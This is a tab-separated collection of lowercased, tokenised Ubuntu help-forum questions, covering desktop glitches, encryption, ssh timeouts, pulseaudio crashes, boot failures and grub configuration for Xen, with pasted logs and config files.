105547	why is ubuntu so freaking awesome ?	i 've been reading about apple 's new os ( mountain lion ) and how people are raving about its `` new '' features . features which ubuntu has had for ages already . which just proves that all the unity hatred is not thinking ahead . i 'm sorry . i know my question is n't helpful to this website . you can close this thread . i just wanted to make you smile and feel proud . although , technically , it is a question that requires an answer , you know ...
105552	how can i enable smooth-scrolling ?	how can i enable smoothscrolling ? with the mac , this looks much smoother and with windows i use the program smoothscroll which gives the same experience . i mean smoothscrolling everywhere , not the fake-smoothscrolling by firefox .
105554	drive encryption - situation after reinstall/upgrade ?	i am considering encrypting my /home directory ( i always have it in a separate drive partition ) while i do a fresh install of upcoming 12.04 release . i have some concerns in this regard : now i am running ubuntu 11.10 . can i encrypt my present home while installing ubuntu 12.04 . will it work fine if i do it while installing beta release ? what precautions do i need to take while going for a fresh ubuntu install later on ? is something like retaining the same password necessary for accessing the directory after the install process ( i will be maintaining same home directory ) ? what would be the situation if i forget my password ? if i do a password reset at startup will i continue to have access to encrypted directory ?
105557	mounting second hard drive in ubuntu 11.10	i 've been trying to mount a second hard drive into ubuntu . i 've been following this guide and a few others that are essentially the same . everything 's going fine until i try to add a file or folder to the mounted drive - i 'm then getting permissions errors . the guides i 've looked at seem to suggest you only need the correct permissions for the folder you 're mounting into ( /mnt/sdb ) in my case . when the hd is n't mounted to the folder i 'm able to write to it , however as soon as i mount to the folder i get an access denied error . i 've tried formating the disk as fat32 and ext3 ( fat32 would be better so i can access the hd in windows ) and i 'm getting the same error either way . i 've also tried various permissions settings on both the directory i 'm mounting to and /dev/sdb1 without any success . any help would be appreciated .
105558	how do i disable the super key ?	i want to disable the super key , when i press super nothing should happen . how can i do that ?
105561	why this white line appears between top bar and wallpaper ?	after trying on some gnome extensions my desktop looks like this : when i maximize something , it fits well to the whole space , but when the desktop is showed , this white line is showed too . it seems like the wallpaper does n't want to touch the top bar and gives it some space . it happens with all the wallpapers i tried . someone could tell me what can i do to fix it ? it worked well before trying the extensions . i 've noticed that if i turn off `` have file manager handle the desktop '' in gnome advance settings , the bar disappears but icons on the desktop disappear , too . if i change the gtk+ theme the bar becomes narrower or changes its colour . the extensions i 've tried were `` music integration , overlay icons , pidgin integration , remove accesibility and remove user name '' i 've uninstalled them one by one but at the end , the annoying white line remains there , even whit all extensions uninstalled . i 've tried also to reset gnome3 to initial settings doing rm -rf .gnome .gnome2 .gconf .gconfd .metacity but it seems nothing happened at all . i tried installing a new gnome shell theme , it did n't work either .
105566	is there a way to view notification history ?	if i walk away from my pc , then there is a good chance i might miss certain notifications . i 've seen in kde that notifications get stored and stacked until you click them ( or whatever ) . unless i 'm missing something , ubuntu does n't seem to have a history of clickable notifications . is there a way to do this ?
105569	how do i disable the notification `` x has left the conversation ''	when i close the active conversation window , my contact receives a notification that i '' left the conversation '' . is there a setting that prevents displaying this message ?
105570	svn commit error	when i commit a change to the ubuntu subversion , i always get the error below . ~ $ sudo svn commit -m `` initial commit '' test.txt -- username akira svn : commit failed ( details follow ) : svn : ca n't open file '/home/svn/myrepo/db/txn-current-lock ' : permission denied how should i set the permission to the txn-current-lock ? i set the permissions below beforehand . ~ $ sudo chown -r taro : subversion myrepo ~ $ sudo chmod -r g+rws /home/svn/myrepo
105574	install ubuntu on macbook pro late 2011	has anyone had luck installing ubuntu on this machine . i 've tried the default x64 iso , the amd64+mac iso and both give me an error about initramfs being unable to find a live filesystem . i 've also tried to boot fedora linux in live-mode but it too fails to boot . i read somewhere that i should try boot from the cd while a thumb-drive with the iso 'burned ' on it is also inserted in the machine . that did n't work for me . i 'd appreciate any help .
105575	bleeding edge for selected programs	i am running 10.04 and have octave 3.2.3 installed . recently , i decided to try my hand at development and hence wanted my octave copy to stay on the bleeding edge . ordinarily , this could be done by using a ppa and adding it to sources ( correct ? ) but octave does n't have a ppa . so , how do make sure that every time i begin writing a development code , my copy of octave is the latest one . my apologies if this question has already been asked .
105577	can not install software from the software-center	i have a problem . i want to install software from the software-center but when i click on `` install '' comes a pop-up with this text in german : anscheinend gibt es einen programmfehler in aptdaemon , der anwendung , die ihnen das installieren/entfernen von anwendungen und das ausfăźhren weiterer paketverwaltungsaufgaben ermăśglicht . in details : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the libwww-robotrules-perl package . this might mean you need to manually fix this package . sorry for this question . i have ubuntu since two days and my english is bad .
105580	php5-mysql install , error 404 not found	i get this message when i try to install php5-mysql http : //ports.ubuntu.com/ubuntu-ports/pool/main/p/php5/php5-mysql_5.3.3-1ubuntu9.7_powerpc.deb 404 not found it 's the same when i try both the ubuntu software center and apt-get install so it seams like the .deb file does n't exist . any idea on how i can install the php5-mysql package ? i 'm using a powerpc . ( btw , i have the same problem with phpmyadmin , the package does n't exist )
105582	how do i set up a second display via dvi/viewport with a lenovo t420s ?	my lenovo t420s has a discrete graphic card with nvidia optimus technology . what i 'm basically trying to achieve is the following : use a second display - connected via dvi/viewport - at work ( vga is blurry ) achieve a moderate to good battery performance while travelling ( 2 hours ) as far as i figured out , i have the following options : disable optimus , use internal graphics exclusively disable optimus , use nvidia exclusively enable optimus , use bumblebee ( homepage ) / ironhide ( 1 ) disqualifies as i read ( and experienced ) that dvi / viewport is technically not usable via internal graphics ( 2 ) have n't really tried so far , just a quick test-install that booted into a black screen after i added the nvidia drivers : - ( ( 3 ) followed this blog , used bumblebee instead of ironhide . bumblebee worked ( i can see impressive fps on glxgears ) , but i did not get the second display to be recognized . i also felt lost in the nvidia-driver-hell and had no chance to run nvidia-xconfig , simply because it was not installed . no idea if a second display is supposed to be recognized out of the box ? do i need to install more ? do i need to mess with my xorg.conf ? many questions , few answers . so , what can i do to achieve my goals ? which path to follow , and what are the next steps ? any hint is welcome : - ) update : thanks to everyone who answered . i will migrate my work environment to a `` discrete '' installation , and will use `` optimus/bumblebee '' as a parallel play project and see how far i get ... i will post future questions in new threads .
105583	ubuntu server remote ssh troubles	i have a following problem : i ca n't connect to a freshly deployed ubuntu-server 11.10 through ssh from a remote host . error : connection timeout . troubleshooting so far : connect locally - connecting through ssh on a local network works like a charm . check the router - there are no rules that can impact ssh traffic . check the distro - if i launch a ubuntu-desktop livecd on the same machine - everything works as it should . so , the distro 's default configuration seems to be the culprit . configuration details : - openssh has been installed through selecting a role during the installation . - other than that everything is configured by default . verbose ssh output : here 's the output , everything freezes after trying to estabilish a connection ( port 2102 is forwarded to port 22 on the server ) : ssh -vvv -p 2102 myhost openssh_5.6p1 , openssl 0.9.8r 8 feb 2011 debug1 : reading configuration data /etc/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to myhost [ hostip ] port 2102. debug1 : connect to address hostip port 2102 : operation timed out ssh : connect to host myhost port 2102 : operation timed out can anyone tell me what could be the problem ?
105587	how to update vlc to the latest version ?	as vlc 2.0 is released , how do i get it in ubuntu ( xubuntu actually , in my case ) 11.10 ? any ppas or packages to download ? the official page says `` ask your favorite packager ... ''
105590	how can i set top left corner to have ( 0,0 ) coordinates in inkscape ?	i want to reverse the coordinate origin in inkscape to top left corner . by default ( 0,0 ) stays at bottom left . changing it to top left corner will help me in designing a sprite sheet for my game .
105593	pulseaudio keeps getting killed in oneiric	since i upgraded to ubuntu 11.10 ( oneiric ) , my pulseaudio tends to crash a few times a day , if i 'm listening to music on youtube . it restarts automatically ( as long as i 'm using a unity session -- it does n't auto-restart if i use gnome , apparently ) , but forgets the volume setting ( speaker icon shows 'mute ' ) , which is how i know it crashed . also i need to reload the browser tab with youtube to make it play sound again . i 'm trying to debug this . when i use a gnome shell session instead of unity , pulseaudio dies and does n't autorestart . i have to restart it manually in a terminal . ( also , my volume icon disappears and volume keys stop reacting . even after i restart pa manually . ) this is how i noticed that pa was n't just crashing -- it was getting killed by a signal ( sigkill ) . edit : evidence for this : language=c pulseaudio -vv dies with a message `` nutraukta ( killed ) '' , which ignores my request ( language=c ) to use english , so i assume it comes from bash and not pulseaudio itself . and $ ? is equal to 137 , which is 128 ( killed by a signal ) + 9 ( sigkill ) . i have n't figured out a pattern yet . this does n't happen always -- sometimes i play maybe 10 songs on youtube and then pa gets killed as i try to watch the 11th . sometimes it gets killed after a long period of inactivity . sometimes it gets killed on resume . any ideas how i might track who is killing my pa ? i intend to file a bug about this , once i figure out what is happening and which program is responsible . update : people in # pulseaudio on irc.freenode.net say it could be a bug in the alsa driver that makes pulseaudio keep rewinding the stream , eating the cpu in a realtime thread , which then gets killed by the kernel for exceeding cputime limits . i 'm still trying to reproduce this with verbose pulseaudio debugging enabled . another update : i 've reproduced the issue a few times , once under strace , once with pulseaudio -vvvv . there 's nothing suspicious ( to me ) in any of the logs just before the sigkill arrives .
105599	how to fix vlc not recognizing the input format from youtube lens ?	i have ubuntu 11.10 and vlc 1.1.12 . when i click on a video result in the lens , it opens vlc and i get the following error : vlc ca n't recognize the input 's format : the format of 'http : //www.youtube.com/v/t4h_zoh7g5a ' can not be detected . have a look at the log for details . how do i fix this ?
105600	stuck on a blank screen with a flashing cursor and a udevd error	i have ubuntu 11.10 and am facing a black screen with a flashing mouse arrow . it 's as if i am stuck on the splash screen , and everytime after the mouse arrow flashes , there is a new line of text with the error message - unknown error : udevd ( 318 ) : spacified user 'john rage ' . it is to be noted that this problem occured only after a bunch of updates and a restart after it . here is a little information that might help . you can find more information on the ubuntu turkish forums thread . lspci | grep vga gives me : compatible 00.02.0 controler vga : intel corp. mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) sudo service ligthdm start gives me a black screen again . here is the output of /etc/apt/sources.lst : # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //tr.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted universe multiverse deb-src http : //tr.archive.ubuntu.com/ubuntu/ oneiric-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //extras.ubuntu.com/ubuntu oneiric main also , here is a screenshot of /etc/apt/sources.lst.d/ : here is a list of my files on my /dev directory : crw-rw -- -- 1 root video 10 , 175 2011-10-12 14:27 agpgart crw-rw -- -- 1 root audio 14 , 4 2011-10-12 14:27 audio crw-rw -- - - 1 root audio 14 , 20 2011-10-12 14:27 audio1 crw-rw -- -- 1 root audio 14 , 36 2011-10-12 14:27 audio2 crw-rw -- -- 1 root audio 14 , 52 2011-10-12 14:27 audio3 crw-rw -- -- 1 root audio 14 , 7 2011-10-12 14:27 audioctl crw -- -- -- - 1 root tty 5 , 1 2011-10 - 12 14:27 console lrwxrwxrwx 1 root root 11 2012-01-05 23:48 core - > / proc / kcore crw-rw -- -- 1 root audio 14 , 3 2011-10-12 14:27 dsp crw-rw -- -- 1 root audio 14 , 19 2011-10-12 14:27 dsp1 crw-rw -- -- 1 root audio 14 , 35 2011-10-12 14:27 dsp2 crw-rw -- -- 1 root audio 14 , 51 2011-10-12 14:27 dsp3 lrwxrwxrwx 1 root root 13 ââ2012-01-05 23:48 fd - > / proc / self / fd crw-rw-rw-1 root root 1 , 7 , 2011-10 -12 14:27 full crw-rw -- -- 1 root fuse 10 , 229 2011-10-12 14:28 fuse crw-r -- -- - 1 root kmem 1 , 2 2011-10-12 14:27 kmem brw-rw -- -- 1 root disk 7 , 0 2011-10-12 14:27 loop0 brw-rw -- -- 1 root disk 7 , 1 2011-10-12 14:27 loop1 brw-rw - - 1 root disk 7 , 2 2011-10-12 14:27 loop2 brw-rw -- -- 1 root disk 7 , 3 2011-10-12 14:27 loop3 brw-rw -- -- 1 root disk 7 , 4 2011-10-12 14:27 loop4 brw-rw -- -- 1 root disk 7 , 5 2011-10-12 14:27 loop5 brw-rw -- -- 1 root disk 7 , 6 2011-10 - 12 14:27 loop6 brw-rw -- -- 1 root disk 7 , 7 2011-10-12 14:27 loop7 drwxr-xr-x 2 root root 4096 2011-10-12 14:28 mapper crw-r - -- - 1 root kmem 1 , 1 2011-10-12 14:27 mem crw-rw -- -- 1 root audio 35 , 0 2011-10-12 14:27 midi0 crw-rw -- -- 1 root audio 14 , 2 2011-10-12 14:27 midi00 crw-rw -- -- 1 root audio 14 , 18 2011-10-12 14:27 midi01 crw-rw -- -- 1 root audio 14 , 34 2011-10 14:27 -12 midi02 crw-rw -- -- 1 root audio 14 , 50 2011-10-12 14:27 midi03 crw-rw -- -- 1 root audio 35 , 1 2011-10-12 14:27 midi1 crw-rw -- -- 1 root audio 35 , 2 2011-10-12 14:27 midi2 crw-rw -- -- 1 root audio 35 , 3 2011-10-12 14:27 midi3 crw-rw -- - - 1 root audio 14 , 0 2011-10-12 14:27 mixer crw-rw -- -- 1 root audio 14 , 16 2011-10-12 14:27 mixer1 crw-rw -- -- 1 root audio 14 , 32 2011-10-12 14:27 mixer2 crw-rw -- -- 1 root audio 14 , 48 2011-10-12 14:27 mixer3 crw-rw -- -- 1 root audio 31 , 0 2011-10-12 14:27 mpu401data crw-rw -- -- 1 root audio 31 , 1 2011-10-12 14:27 mpu401stat crw-rw-rw-1 root root 1 , 3 2011-10-12 14:27 null crw-r -- -- - 1 root kmem 1 , 4 2011-10-12 14:27 port crw-rw-rw-1 root tty 5 , 2 2011-10-05 21:31 ptmx drwxr-xr-x 2 root root 4096 2011-10-12 14:27 pts ram lrwxrwxrwx 1 root root 4 2012-01-05 23:48 - > ram1 brw-rw -- -- 1 root disk 1 , 0 2011-10-12 14:27 ram0 brw- rw -- -- 1 root disk 1 , 1 2011-10-12 14:27 ram1 brw-rw -- -- 1 root disk 1 , 10 2011-10-12 14:27 ram10 brw-rw -- -- 1 root disk 1 , 11 2011-10-12 14:27 ram11 brw-rw -- -- 1 root disk 1 , 12 2011-10-12 14:27 ram12 brw-rw -- -- 1 root disk 1 , 13 2011 -10-12 14:27 ram13 brw-rw -- -- 1 root disk 1 , 14 2011-10-12 14:27 ram14 brw-rw -- -- 1 root disk 1 , 15 2011-10-12 14 : 27 ram15 brw-rw -- -- 1 root disk 1 , 16 2011-10-12 14:27 ram16 brw-rw -- -- 1 root disk 1 , 2 2011-10-12 14:27 ram2 brw-rw- -- - 1 root disk 1 , 3 2011-10-12 14:27 ram3 brw-rw -- -- 1 root disk 1 , 4 2011-10-12 14:27 ram4 brw-rw -- -- 1 root disk 1 , 5 2011-10-12 14:27 ram5 brw-rw -- -- 1 root disk 1 , 6 2011-10-12 14:27 ram6 brw-rw -- -- 1 root disk 1 , 7 , 2011-10 14:27 -12 ram7 brw-rw -- -- 1 root disk 1 , 8 2011-10-12 14:27 ram8 brw-rw -- -- 1 root disk 1 , 9 2011-10-12 14:27 ram9 crw-rw-rw-1 root root 1 , 8 2011-10-12 14:27 random crw-rw -- -- 1 root audio 35 , 64 2011-10-12 14:27 rmidi0 crw-rw -- -- 1 root audio 35 , 65 2011-10-12 14:27 rmidi1 crw-rw -- -- 1 root audio 35 , 66 2011-10-12 14:27 rmidi2 crw-rw -- -- 1 root audio 35 , 67 2011-10-12 14:27 rmidi3 crw-rw -- -- 1 root audio 14 , 1 2011-10-12 14:27 sequencer drwxr-xr-x 2 root root 4096 2011-10-12 14:27 shm crw -rw -- -- 1 root audio 35 , 128 2011-10-12 14:27 smpte0 crw-rw -- -- 1 root audio 35 , 129 2011-10-12 14:27 smpte1 crw-rw -- -- 1 root audio 35 , 130 2011-10-12 14:27 smpte2 crw-rw -- -- 1 root audio 35 , 131 2011-10-12 14:27 smpte3 crw-rw -- -- 1 root audio 14 , 6 2011-10-12 14:27 sndstat lrwxrwxrwx 1 root root 4 2012-01-05 23:48 stderr - > fd / 2 lrwxrwxrwx 1 root root 4 2012-01-05 23:48 stdin - > fd / 0 lrwxrwxrwx 1 root root 4 2012-01-05 23:48 stdout - > fd / 1 crw-rw-rw-1 root tty 5 , 0 2011-10-12 14:27 tty crw -- -- -- - 1 root tty 4 , 0 2011-10-12 14:27 tty0 crw -- -- -- - 1 root tty 4 , 1 2011-10-12 14:27 tty1 crw -- -- -- - 1 root tty 4 , 2 , 2011-10 -12 14:27 tty2 crw -- -- -- - 1 root tty 4 , 3 2011-10-12 14:27 tty3 crw -- -- -- - 1 root tty 4 , 4 2011-10-12 14 : 27 tty4 crw -- -- -- - 1 root tty 4 , 5 2011-10-12 14:27 tty5 crw -- -- -- - 1 root tty 4 , 6 2011-10-12 14:27 tty6 crw- -- -- -- 1 root tty 4 , 7 2011-10-12 14:27 tty7 crw -- -- -- - 1 root tty 4 , 8 2011-10-12 14:27 tty8 -- -- - crw - 1 root tty 4 , 9 2011-10-12 14:27 tty9 crw-rw-rw-1 root root 1 , 9 2011-10-12 14:27 urandom crw-rw-rw-1 root root 1 , 5 2011-10-12 14:27 zero the output that i get for startx is on pastebin .
105602	skype stops to send and receive chat messages after 10+ mins into the chat/login	i am using 11.10+unity . i use skype ( version 2.2.0.35 ) for office communication . after sometime into the chat , the skype does not send or receive any chat messages . although the chat is on , and other people are chatting . after sudo killall -9 skype i restart it i get all the messages , even from the chat i have missed-with-skype-on earlier . i donot see any notification updates also . after sometime ( probably 5 mins or so ) this happens again , and i have to restart the skype . i now see updated notification for missed chats also . is anyone facing such and issue ? does anyone have any solution to it ?
105606	how to set grub to automatically load xen kernel	how do you configure grub to automatically use the xen kernel under ubuntu 11.10 ? no matter what i do , it loads the first menuentry . the only way i can get it to load xen is to manually select the kernel , which i ca n't do if i have to reboot the server remotely , or there 's a power failure and the machine automatically boots up when power 's restored , etc . it 's driving me nuts . in my /boot/grub/grub.cfg , the xen kernel is at index 4 ( i.e . it 's the 5th menuentry ) . so i 've tried : setting grub_default=4 , and running sudo update-grub setting grub_default=saved and grub_savedefault=true , and running sudo update-grub setting grub_default= '' ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-16-server '' , and running sudo update-grub none of these work . it continues to load the first menuentry , which is `` ubuntu , with linux 3.0.0-16-server '' . below is my current /boot/grub/grub.cfg . what am i doing wrong ? # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-16-server '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=2 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.0.0-16-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac linux /boot/vmlinuz-3.0.0-16-server root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro initrd /boot/initrd.img-3.0.0-16-server } menuentry 'ubuntu , with linux 3.0.0-16-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading linux 3.0.0-16-server ... ' linux /boot/vmlinuz-3.0.0-16-server root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-16-server } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.0.0-12-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac linux /boot/vmlinuz-3.0.0-12-server root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro initrd /boot/initrd.img-3.0.0-12-server } menuentry 'ubuntu , with linux 3.0.0-12-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading linux 3.0.0-12-server ... ' linux /boot/vmlinuz-3.0.0-12-server root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-12-server } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # submenu `` xen 4.1-amd64 '' { menuentry 'ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-16-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading xen 4.1-amd64 ... ' multiboot /boot/xen-4.1-amd64.gz placeholder echo 'loading linux 3.0.0-16-server ... ' module /boot/vmlinuz-3.0.0-16-server placeholder root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro echo 'loading initial ramdisk ... ' module /boot/initrd.img-3.0.0-16-server } menuentry 'ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-16-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading xen 4.1-amd64 ... ' multiboot /boot/xen-4.1-amd64.gz placeholder echo 'loading linux 3.0.0-16-server ... ' module /boot/vmlinuz-3.0.0-16-server placeholder root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro single echo 'loading initial ramdisk ... ' module /boot/initrd.img-3.0.0-16-server } menuentry 'ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-12-server ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading xen 4.1-amd64 ... ' multiboot /boot/xen-4.1-amd64.gz placeholder echo 'loading linux 3.0.0-12-server ... ' module /boot/vmlinuz-3.0.0-12-server placeholder root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro echo 'loading initial ramdisk ... ' module /boot/initrd.img-3.0.0-12-server } menuentry 'ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.0.0-12-server ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac echo 'loading xen 4.1-amd64 ... ' multiboot /boot/xen-4.1-amd64.gz placeholder echo 'loading linux 3.0.0-12-server ... ' module /boot/vmlinuz-3.0.0-12-server placeholder root=uuid=d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac ro single echo 'loading initial ramdisk ... ' module /boot/initrd.img-3.0.0-12-server } } # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod raid insmod mdraid1x insmod part_msdos insmod part_msdos insmod ext2 set root= ' ( mduuid/be73165bc31d6f5cd00d05036c7b964f ) ' search -- no-floppy -- fs-uuid -- set=root d72bad3f-9ed7-44b9-b3d1-d7af9f62a8ac linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
